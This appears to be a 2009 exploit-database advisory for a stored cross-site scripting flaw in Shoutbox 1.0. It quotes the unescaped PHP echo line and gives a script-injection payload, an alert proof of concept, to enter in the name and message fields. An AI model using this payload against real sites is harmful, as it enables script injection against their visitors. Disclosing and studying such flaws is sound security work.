id: 9997
date: 11/18/2009
title: Shoutbox 1.0 HTML / Xss Injection
author: SkuLL-HacKeR
cves: 

=================================
Shoutbox 1.0 HTML / Xss Injection
=================================

# Vulnerable Code in index.php :
#
# <p><strong><?php echo $names[$i]; ?>:</strong> <?php echo $shouts[$i]; ?></p>
#
########################################
# Shoutbox 1.0 HTML / Xss inejction exploit
# AuTh0r  : SKuLL-HacKeR                                                                                          
########################################
  
Vendor: http://www.plohni.com
exploit:
site.com/Shoutbox/index.php
in the select your name and your text put this code
'">><script>alert('XSS skh')</script>



#  0day.today [2023-03-22]  #